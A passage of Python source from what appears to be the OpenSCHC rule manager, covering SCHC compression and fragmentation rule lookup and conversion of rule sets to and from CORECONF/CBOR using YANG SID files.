r[T_FP])][1],\n arg, direction=direction):\n matches += 1\n else:\n if failed_field:\n print(\"rule {}/{}: field {} does not match TV={} FV={} rlen={} flen={} arg={}\".format(\n rule[T_RULEID], rule[T_RULEIDLENGTH],\n r[T_FID],\n r[T_TV], pkt[(r[T_FID], r[T_FP])][0],\n r[T_FL], pkt[(r[T_FID], r[T_FP])][1],\n arg))\n break # field does not match, rule does not match\n else:\n if r[T_FL] == \"var\": # entry not found, but variable length => accept\n matches += 1 # residue size set to 0\n dprint(\"Suboptimal rule\")\n else:\n dprint(\"field from rule not found in pkt\")\n break # field from rule not found in pkt, go to next\n print (\"->\", matches)\n print(\"-\"*10, \"matches:\", matches, len(pkt), rule[T_META][T_UP_RULES], rule[T_META][T_DW_RULES])\n if direction == T_DIR_UP and matches == rule[T_META][T_UP_RULES]: return rule\n if direction == T_DIR_DW and matches == rule[T_META][T_DW_RULES]: return rule\n return None\n\n def FindNoCompressionRule(self, deviceID=None):\n for d in self._ctxt:\n if d[\"DeviceID\"] == deviceID:\n for r in d[\"SoR\"]:\n if T_NO_COMP in r:\n return r\n\n return None \n\n def FindFragmentationRule(self, deviceID=None, originalSize=None, \n reliability=T_FRAG_NO_ACK, direction=T_DIR_UP, \n packet=None):\n \"\"\"Lookup a fragmentation rule.\n\n Find a fragmentation rule regarding parameters:\n * original SCHC packet size\n * reliability NoAck, AckOnError, AckAlways\n * direction (UP or DOWN)\n NOTE: Not yet implemented, returns the first fragmentation rule. \n XXX please check whether the following strategy is okey.\n - if direction is specified, and deviceID is None, it is assumed that\n the request is for a device. Return the 1st rule matched with the\n direction regardless of the deviceID. A deviceID for a device is\n not configured typically.\n - if raw_packet is not None, it compares the rule_id with the packet.\n - if the direction and the deviceID is matched.\n \"\"\"\n dprint(\"FindFragmentationRule\", deviceID, direction)\n\n if direction is not None and deviceID is not None:\n for d in self._ctxt:\n if d[\"DeviceID\"] == deviceID:\n for r in d[\"SoR\"]:\n if T_FRAG in r and r[T_FRAG][T_FRAG_DIRECTION] == direction:\n return r\n\n elif direction is not None and deviceID is None:\n for d in self._ctxt:\n for r in d[\"SoR\"]:\n if T_FRAG in r and r[T_FRAG][T_FRAG_DIRECTION] == direction:\n # return the 1st one.\n return r\n elif packet is not None:\n print(\"packet dev-id\", deviceID)\n for d in self._ctxt:\n for r in d[\"SoR\"]:\n print(\"rule dev-id\", d[\"DeviceID\"])\n if T_FRAG in r:\n rule_id = packet.get_bits(r[T_RULEIDLENGTH], position=0)\n if r[T_RULEID] == rule_id:\n return r\n else:\n for d in self._ctxt:\n if d[\"DeviceID\"] == deviceID:\n for r in d[\"SoR\"]:\n if T_FRAG in r:\n return r\n return None\n\n# CORECONF \n\n def add_sid_file(self, name):\n with open(name) as sid_file:\n sid_values = json.loads(sid_file.read())\n\n if 'key-mapping' not in sid_values:\n print (\"\"\"{} sid files has not been genreated with the --sid-extention options.\\n\\\nSome conversion capabilities may not works. see http://github.com/ltn22/pyang\"\"\".format(name)) \n else:\n for k, v in sid_values['key-mapping'].items():\n if k in self.sid_key_mapping:\n print (\"key sid\", k, \"already present, ignoring...\")\n else: \n self.sid_key_mapping[int(k)] = v\n del(sid_values[\"key-mapping\"])\n\n self._sid_info.append(sid_values)\n\n def sid_search_for(self, name, space=\"data\"):\n\n for s in self._sid_info:\n for e in s[\"items\"]:\n if e[\"identifier\"] == name and e[\"namespace\"]==space:\n return e[\"sid\"]\n return None \n\n def sid_search_sid(self, value, short=False):\n \"\"\"return YANG ID form a SID, if short is set to true, the module id is not concatenated.\"\"\"\n for s in self._sid_info:\n name = s[\"module-name\"]\n for e in s[\"items\"]:\n if e[\"sid\"] == value:\n if e[\"namespace\"] == \"identity\":\n if short:\n return e[\"identifier\"]\n else: \n return name + \":\" + e[\"identifier\"]\n elif e[\"namespace\"] == \"data\":\n return e[\"identifier\"]\n else:\n raise ValueError(\"not a good namespace\", e[\"namespace\"])\n\n raise ValueError(\"Not found\", value)\n return None \n\n def openschc_id (self, yang_id):\n \"\"\"return an OpenSCHC ID giving a yang ID stored in .sid files\"\"\"\n for i in YANG_ID:\n if YANG_ID[i][1] == yang_id:\n return i\n\n raise ValueError(yang_id, \"not known by openSCHC\")\n\n def get_yang_type (self, yangid):\n for s in self._sid_info:\n module_name = s['module-name']\n for e in s['items']:\n if e['identifier'] == yangid:\n if \"type\" in e:\n if type(e['type']) is str:\n if e[\"type\"] in [\"int8\", \"int16\", \"int32\", \"uint8\", \"uint16\", \"uint32\"]:\n return \"int\"\n elif e[\"type\"] in [\"string\", 'binary']:\n return e['type']\n else:\n return 'identifier'\n elif type(e['type']) is list: # union, should be extended\n \"\"\"In theorie, this function is called when a cbor data for an int is found. \n regarding the CORECONF coding, other alternative\n identifier or enum are tagged, and will be processed directly by other\n function, so whenan union is found, it should be the array. The only test\n is to check that int in the array or generate an error. \"\"\"\n return 'union'\n else: \n return \"node\" # this is not a leaf\n return None #yandid not found\n\n\n def cbor_header (self, major, value):\n if value < 23:\n return struct.pack ('!B', (major | value))\n elif value < 255:\n return struct.pack ('!BB', (major | 24), value)\n\n def from_coreconf(self, device=None, dev_info=None, file=None, compression=True):\n \"\"\"\n Take a coreconf representation and store it in the rule manager.\n \"\"\"\n\n assert (dev_info is not None or file is not None)\n\n if file != None:\n dev_info = open(file).read() \n\n # allows CBOR or Python structure, if CBOR convert it in Python. \n if type(dev_info) is bytes:\n rule_input = cbor.loads(dev_info) # store CBOR CORECONF\n elif type(dev_info) is dict:\n rule_input = dev_info # coreconf already in python\n else:\n raise ValueError(\"Unknown rule format\")\n\n SoR = []\n\n schc_id = self.sid_search_for(name=\"/ietf-schc:schc\", space=\"data\")\n\n if not schc_id in rule_input:\n print (\"This is a not a Set of Rule\")\n return None\n\n entry = rule_input[schc_id]\n\n sid_ref = self.sid_search_for(name=\"/ietf-schc:schc/rule\", space=\"data\")\n rid_value_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - sid_ref\n rid_length_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - sid_ref\n rule_nature_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - sid_ref\n for rule in entry[1]:\n arule = {}\n arule[T_RULEID] = rule[rid_value_sid]\n arule[T_RULEIDLENGTH] =rule[rid_length_sid]\n rule_nature = rule[rule_nature_sid]\n\n nature = self.sid_search_sid (rule_nature, short=True)\n if nature == \"nature-compression\":\n entry = []\n entry_ref = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry\", space=\"data\") \n entry_sid = entry_ref - sid_ref\n fid_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-id\", space=\"data\") - entry_ref\n fl_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-length\", space=\"data\") - entry_ref\n fpos_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-position\", space=\"data\") - entry_ref\n dir_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/direction-indicator\", space=\"data\") - entry_ref\n mo_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator\", space=\"data\") - entry_ref\n mo_val_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator-value\", space=\"data\") - entry_ref\n cda_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/comp-decomp-action\", space=\"data\") - entry_ref\n tv_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/target-value\", space=\"data\") - entry_ref\n\n up_rules = 0\n dw_rules = 0\n for r in rule[entry_sid]:\n entry_elm = {}\n\n fid_value = r[fid_sid]\n fid_yang_name = self.sid_search_sid (fid_value, short=True)\n o_schc_id = self.openschc_id(fid_yang_name)\n entry_elm[T_FID] = o_schc_id\n\n fl_value = r[fl_sid]\n if type(fl_value) is cbor.CBORTag and fl_value.tag == 45:\n fl_value = self.sid_search_sid(fl_value.value, short = True)\n if fl_value == \"fl-token-length\": # use OPENSCHC ID\n fl_value = T_FUNCTION_TKL \n elif fl_value == \"fl-variable\":\n fl_value = T_FUNCTION_VAR\n entry_elm[T_FL] = fl_value\n\n dir_value = r[dir_sid]\n dir_yang_name = self.sid_search_sid (dir_value, short=True)\n o_schc_id = self.openschc_id(dir_yang_name) \n entry_elm[T_DI] = o_schc_id\n\n if o_schc_id == T_DIR_BI:\n up_rules += 1\n dw_rules += 1\n elif o_schc_id == T_DIR_UP:\n up_rules += 1\n elif o_schc_id == T_DIR_DW:\n dw_rules += 1\n\n fpos = r[fpos_sid]\n entry_elm[T_FP] = fpos\n\n mo_value = r[mo_sid]\n mo_yang_name = self.sid_search_sid (mo_value, short=True)\n o_schc_id = self.openschc_id(mo_yang_name)\n entry_elm[T_MO] = o_schc_id\n\n if mo_val_sid in r:\n values = self.get_values(r[mo_val_sid])\n entry_elm[T_MO_VAL] = int.from_bytes(values[0], byteorder='big') # 1 arg = length\n\n cda_value = r[cda_sid]\n cda_yang_name = self.sid_search_sid (cda_value, short=True)\n o_schc_id = self.openschc_id(cda_yang_name)\n entry_elm[T_CDA] = o_schc_id\n\n if tv_sid in r:\n values = self.get_values(r[tv_sid])\n #print (values)\n if len (values) == 1:\n entry_elm[T_TV] = values[0]\n else:\n entry_elm[T_TV] = values\n\n #print (entry_elm, up_rules, dw_rules)\n\n entry.append(entry_elm)\n\n arule[T_COMP] = entry\n if not T_META in arule:\n arule[T_META] = {}\n arule[T_META][T_UP_RULES] = up_rules\n arule[T_META][T_DW_RULES] = dw_rules\n arule[T_META][T_DEVICEID] = device\n\n\n elif nature ==\"nature-fragmentation\":\n #print ('fragmentation')\n arule[T_FRAG] = {}\n arule[T_FRAG][T_FRAG_PROF] = {}\n frag_mod_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/fragmentation-mode\", space=\"data\") - sid_ref\n frag_mod_id = self.sid_search_sid(rule[frag_mod_sid], short=True)\n\n l2_word_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/l2-word-size\", space=\"data\") - sid_ref\n if l2_word_sid in rule:\n l2_word = rule[l2_word_sid]\n if l2_word != 8:\n raise ValueError(\"OpenSCHC only support 8 bit long l2 words\")\n else:\n #print (\"L2 Word set to 8 by default\")\n l2_word = 8\n\n direction_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/direction\", space=\"data\") - sid_ref\n direction = self.sid_search_sid(rule[direction_sid], short=True)\n\n if direction == 'di-up':\n arule[T_FRAG][T_FRAG_DIRECTION] = T_DIR_UP\n elif direction == 'di-down':\n arule[T_FRAG][T_FRAG_DIRECTION] = T_DIR_DW\n else:\n raise ValueError (\"Unknown fragmentation rule direction\", direction)\n\n dtag_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/dtag-size\", space=\"data\") - sid_ref\n if dtag_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE] = rule[dtag_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE] = 0\n\n w_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/w-size\", space=\"data\") - sid_ref\n if w_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE] = rule[w_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE] = 0\n\n fcn_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/fcn-size\", space=\"data\") - sid_ref\n if fcn_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN] = rule[fcn_size_sid]\n else:\n raise ValueError(\"FCN must be specified\")\n\n rcs_algo_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rcs-algorithm\", space=\"data\") - sid_ref\n if rcs_algo_sid in rule:\n rcs_algo = self.sid_search_sid(rule[rcs_algo_sid], short=True)\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC] = self.openschc_id(rcs_algo)\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC] = T_FRAG_RFC8724\n\n max_pkt_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/maximum-packet-size\", space=\"data\") - sid_ref\n if max_pkt_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_PACKET_SIZE] = rule[max_pkt_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_PACKET_SIZE] = 1280\n\n window_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/window-size\", space=\"data\") - sid_ref\n if window_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] = rule[window_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] = 2**arule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN] - 1\n if arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] < 1: #case if W is 0 or 1\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] = 1\n \n max_inter_frame_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/max-interleaved-frames\", space=\"data\") - sid_ref\n if max_inter_frame_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_INTER_FRAME] = rule[max_inter_frame_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_INTER_FRAME] = 1\n\n inac_timer_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/inactivity-timer\", space=\"data\") - sid_ref\n if inac_timer_sid in rule:\n inac_timer = rule[inac_timer_sid]\n tick_duration_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/inactivity-timer/ticks-duration\", space=\"data\") - inac_timer_sid\n tick_number_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/inactivity-timer/ticks-numbers\", space=\"data\") - inac_timer_sid\n \n if tick_duration_sid in inac_timer:\n tick_duration = inac_timer[tick_duration_sid]\n else:\n tick_duration = 20\n\n if tick_number_sid in inac_timer:\n tick_number = inac_timer[tick_number_sid]\n else:\n tick_number = 600 # Value to be checked\n\n inactivity_timer = int(tick_number * (2**tick_duration / 10**6))\n else:\n inactivity_timer = 12 * 60 * 60 # default timer in seconds\n\n retrans_timer_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/retransmission-timer\", space=\"data\") - sid_ref\n if retrans_timer_sid in rule:\n tick_duration_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/retransmission-timer/ticks-duration\", space=\"data\") - retrans_timer_sid\n tick_number_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/retransmission-timer/ticks-numbers\", space=\"data\") - retrans_timer_sid\n \n if tick_duration_sid in inac_timer:\n tick_duration = inac_timer[tick_duration_sid]\n else:\n tick_duration = 20\n\n if tick_number_sid in inac_timer:\n tick_number = inac_timer[tick_number_sid]\n else:\n tick_number = 60 # Value to be checked\n\n retransmission_timer = int(tick_number * (2**tick_duration / 10**6))\n\n else:\n retransmission_timer = 1 * 60 * 60 # default timer in seconds\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_TIMEOUT] = retransmission_timer\n\n max_ack_req_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/max-ack-requests\", space=\"data\") - sid_ref\n if max_ack_req_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MAX_RETRY] = rule[max_ack_req_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MAX_RETRY] = 4 # openSCHC default value\n\n if frag_mod_id == 'fragmentation-mode-no-ack':\n arule[T_FRAG][T_FRAG_MODE] = T_FRAG_NO_ACK\n elif frag_mod_id == 'fragmentation-mode-ack-always':\n arule[T_FRAG][T_FRAG_MODE] = T_FRAG_ACK_ALWAYS\n elif frag_mod_id == 'fragmentation-mode-ack-on-error':\n arule[T_FRAG][T_FRAG_MODE] = T_FRAG_ACK_ON_ERROR\n\n tile_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/tile-size\", space=\"data\") - sid_ref\n if tile_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_TILE] = rule[max_ack_req_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_TILE] = 10 # openSCHC default value\n\n tile_in_all1_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/tile-in-all-1\", space=\"data\") - sid_ref\n if tile_in_all1_sid in rule:\n tile_in = self.sid_search_sid(rule[max_ack_req_sid], short=True)\n if tile_in == \"all-1-data-no\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = False\n if tile_in == \"all-1-data-yes\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = True\n if tile_in == \"all-1-data-sender-choice\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = None\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = False\n\n ack_behavior_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/tile-in-all-1\", space=\"data\") - sid_ref\n if ack_behavior_sid in rule:\n ack_behavior = self.sid_search_sid(rule[max_ack_req_sid], short=True)\n\n if ack_behavior == \"ack-behavior-after-all-0\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ALL0\n print (\"Warning not implemented\")\n elif ack_behavior == \"ack-behavior-after-all-1\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ALL1\n elif ack_behavior == \"ack-behavior-by-layer2\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ANY\n print (\"Warning not implemented\")\n else:\n raise ValueError (\"Unknwon Ack Behavior\")\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ALL1 # openSCHC default value\n \n else:\n raise ValueError(\"unkwown fragmentation mode\", frag_mod_id)\n\n elif nature == \"nature-no-compression\":\n arule [T_NO_COMP] = []\n else:\n raise ValueError (\"Unknown rule nature SID\", nature)\n\n SoR.append(arule) # add to the set of rules\n\n\n #pprint.pprint(SoR)\n \n self.Add(device=device, dev_info=SoR)\n\n\n def to_coreconf (self, deviceID=\"None\"):\n \"\"\"\n Dump the rules in CORECONF format the rules inside the rule manager for a specific device.\n \"\"\"\n import binascii\n\n def dictify_cbor (val, ref_id):\n cbor_data = b''\n if type(val) != list:\n val = [val]\n\n tv_array = b''\n for i in range(len(val)):\n\n if type(val[i]) == int:\n x = val[i]\n r = b''\n while x != 0:\n r = struct.pack('!B', x&0xFF) + r\n x >>= 8\n elif type(val[i]) == bytes:\n r = val[i]\n\n tv_array += b'\\xA2' + \\\n cbor.dumps(self.sid_search_for(name=ref_id+\"/index\", space=\"data\") - self.sid_search_for(name=ref_id, space=\"data\")) + \\\n cbor.dumps(i)\n\n tv_array += \\\n cbor.dumps(self.sid_search_for(name=ref_id+\"/value\", space=\"data\") - self.sid_search_for(name=ref_id, space=\"data\")) + \\\n cbor.dumps(r)\n\n\n tv_array = self.cbor_header(0b100_00000, len(val)) + tv_array\n return tv_array\n \n module_sid = self.sid_search_for(name=\"/ietf-schc:schc\", space=\"data\")\n rule_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule\", space=\"data\")\n\n\n for dev in self._ctxt:\n #print (\"*\"*40)\n #print (\"Device:\", dev[\"DeviceID\"])\n\n rule_count = 0\n full_rules = b''\n for rule in dev[\"SoR\"]:\n rule_count += 1\n if T_COMP in rule:\n entry_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry\", space=\"data\")\n \n nb_entry = 0\n rule_content = b''\n for e in rule[T_COMP]:\n nb_elm = 0\n nb_entry += 1\n\n entry_cbor = \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-id\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_FID]][1], space=\"identity\")) \n nb_elm += 1\n\n l=e[T_FL]\n if type(l) == int:\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-length\", space=\"data\") - entry_sid) + \\\n cbor.dumps(l)\n elif type(l) == str:\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-length\", space=\"data\") - entry_sid) + \\\n struct.pack(\"!BB\", 0xD8, 45) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[l][1], space=\"identity\")) \n\n #raise ValueError(\"Field ID not defined\")\n else:\n raise ValueError(\"unknown field length value\")\n nb_elm += 1\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-position\", space=\"data\") - entry_sid) + \\\n struct.pack('!B', e[T_FP])\n nb_elm += 1\n \n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/direction-indicator\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_DI]][1], space=\"identity\")) \n nb_elm += 1\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_MO]][1], space=\"identity\")) \n nb_elm += 1\n\n if T_MO_VAL in e:\n mo_val_cbor = dictify_cbor(e[T_MO_VAL], \"/ietf-schc:schc/rule/entry/matching-operator-value\")\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator-value\", space=\"data\") - entry_sid) + \\\n mo_val_cbor\n nb_elm += 1\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/comp-decomp-action\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_CDA]][1], space=\"identity\")) \n nb_elm += 1\n\n if T_TV in e and e[T_TV] != None:\n tv_cbor = dictify_cbor(e[T_TV], \"/ietf-schc:schc/rule/entry/target-value\")\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/target-value\", space=\"data\") - entry_sid) + \\\n tv_cbor\n nb_elm += 1\n \n entry_cbor = self.cbor_header (0b101_00000, nb_elm) + entry_cbor # header MAP and size\n rule_content += entry_cbor\n\n rule_content = b'\\xA4' + \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry\", space=\"data\") - rule_sid) + \\\n self.cbor_header(0b100_00000, nb_entry) + rule_content + \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEID]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEIDLENGTH]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= \"nature-compression\", space=\"identity\")) \n elif T_FRAG in rule:\n nb_elm = 3\n rule_content = \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEID]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEIDLENGTH]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= \"nature-fragmentation\", space=\"identity\")) \n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/direction\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name=YANG_ID[rule[T_FRAG][T_FRAG_DIRECTION]][1], space=\"identity\")) \n nb_elm += 1\n \n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rcs-algorithm\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name=YANG_ID[rule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC]][1], space=\"identity\")) \n nb_elm += 1\n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/dtag-size\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE])\n nb_elm += 1\n\n if rule[T_FRAG][T_FRAG_MODE] in [T_FRAG_ACK_ALWAYS, T_FRAG_ACK_ON_ERROR]:\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/w-size\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE])\n nb_elm += 1\n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/fcn-size\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN])\n nb_elm += 1\n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/fragmentation-mode\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= YANG_ID[rule[T_FRAG][T_FRAG_MODE]][1], space=\"identity\")) \n nb_elm += 1\n \n rule_content = self.cbor_header(0b101_00000, nb_elm) + rule_content\n elif T_NO_COMP in rule:\n rule_content = rule_content = self.cbor_header(0b101_00000, 3) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEID]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEIDLENGTH]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= \"nature-no-compression\", space=\"identity\")) \n else:\n raise ValueError(\"unkwon rule\")\n\n full_rules += rule_content \n \n coreconf = b'\\xA1' + cbor.dumps(module_sid) + b'\\xA1' + cbor.dumps(rule_sid - module_sid) \n\n array_header = self.cbor_header(0b100_00000, rule_count) # array\n\n coreconf += array_header+full_rules\n return coreconf\n # end of CORECONF\n\n def convert_to_json(self, jcc, delta=0, name_ref=\"\"):\n if type(jcc) is dict:\n json_dict = {}\n for k, v in jcc.items():\n sid_description = self.sid_search_sid(k+delta)\n value = self.convert_to_json(v, k+delta, sid_description)\n key = sid_description.replace(name_ref+'/', '')\n\n json_dict[key] = value\n return json_dict\n elif type(jcc) is list:\n json_list = []\n for e in jcc:\n value = self.convert_to_json(e, delta, name_ref )\n json_list.append(value)\n return json_list\n elif type(jcc) is int:\n node_type = self.get_yang_type(name_ref)\n\n if node_type in [\"int\", \"union\"]: #/!\\ to be improved, suppose that union contains an int\n return jcc\n elif node_type == \"identifier\":\n sid_ref = self.sid_search_sid(jcc)\n return sid_ref\n else:\n raise ValueError(name_ref, node_type, \"not a leaf\")\n\n elif type(jcc) is bytes:\n return base64.b64encode(jcc).decode()\n elif type(jcc) is cbor.CBORTag: # TAG == 45, an identifier not an int.\n if jcc.tag == 45:\n sid_ref = self.sid_search_sid(jcc.value)\n return sid_ref\n else:\n raise ValueError(\"CBOR Tag unknown:\", jcc.tag)\n else:\n raise ValueError (\"Unknown type\", type(jcc)) \n\n def get_cc (self, sor, sid=None, keys = [], delta=0, ident=1, value=None):\n #print (\"-\"*ident, sid, keys)\n\n if sid == delta:\n if value == None:\n return sor\n else:\n sor = value\n return True\n\n if type(sor) is dict:\n result = None\n\n if len(keys) == 0 and sid-delta in sor:\n if value == None:\n return {sid: sor[sid-delta]}\n else: # change the value\n sor[sid-delta] = value\n return True\n\n if len(keys) == 0 and value: # element is not in the object \n #print (\"add the element\")\n sor[sid-delta] = value\n return True\n\n for s, v in sor.items():\n #print ('.'*ident, s, v)\n\n # if s+delta == sid:\n # return {s: v}\n\n if s+delta in self.sid_key_mapping: # A list we have keys, look for specific entry\n # Raise an err if the number of SID keys are not the same as the number of keys in self.sid_key_mapping\n if len(self.sid_key_mapping[s+delta]) != len(keys):\n raise ValueError (\"Not enough keys values to locate the SID\")\n\n key_search = {}\n for k in self.sid_key_mapping[s+delta]:\n key_search[k-(s+delta)] = keys.pop(0)\n\n #print (\"!\"*ident, key_search)\n\n found_st = None\n found_index = 0\n for l in sor[s]:\n #print (\"+\"*ident, l)\n if key_search.items() <= l.items(): # searched items included in leaf\n found_st = l\n break\n found_index += 1\n if found_st:\n if sid == s+delta:\n if value == None:\n # keys must be adapted to take into account of the delta coding\n st_delta_adjusted = {}\n # Adjust the keys by developing the complete SID ( completeSID = s + k + delta )\n for k, v in found_st.items():\n st_delta_adjusted[s+k+delta] = v\n return st_delta_adjusted\n else:\n sor[s][found_index] = value\n return True\n return self.get_cc(found_st, delta=s+delta, ident=ident+1, sid=sid, keys=keys, value=value)\n else:\n if value != None:\n print (\"add it\", key_search)\n new_struct = key_search.copy()\n for new_key, new_value in value.items():\n if new_key in new_struct:\n print (\"key leaf \", new_key+delta, \"already set to key value\")\n else: \n new_struct[new_key] = new_value\n\n sor[s].append(new_struct)\n return True\n \n else: # A set of container, take all elements\n if result == 